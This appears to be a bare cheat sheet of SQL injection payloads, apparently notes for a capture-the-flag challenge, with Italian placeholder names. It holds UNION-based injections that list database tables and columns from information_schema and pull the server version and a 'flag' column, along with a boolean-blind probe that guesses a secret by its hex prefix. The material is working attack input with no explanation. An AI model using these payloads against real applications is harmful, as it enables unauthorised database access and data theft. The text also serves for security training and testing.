1' UNION SELECT table_name, column_name,3,4,5,6 FROM information_schema.columns WHERE  '1'='1
' UNION SELECT prima_colonna,seconda_colonna,3,4,5,6 FROM table WHERE colonna_di_esempio='*valore di esempio*' -- 
SELECT table_name, column_name from information_schema.columns WHERE table_schema=DATABASE()
1' union SELECT 1,version(),3,4,5,'6;
SELECT 1,version();
1' union select 1,2,3,4,5,'6
SELECT * FROM dummy_data WHERE id='1'
1' UNION SELECT flag,2,3,4,5,6 FROM real_data WHERE  '1'='1
' UNION SELECT prima_colonna,seconda_colonna,3,4,5,6 FROM table WHERE colonna_di_esempio='*valore di esempio*' AND '1'='1
SELECT * FROM main WHERE id='1' AND (SELECT 1 WHERE 1=1)='1'
1' AND (SELECT 1 WHERE HEX('SECRET') LIKE '0%')='1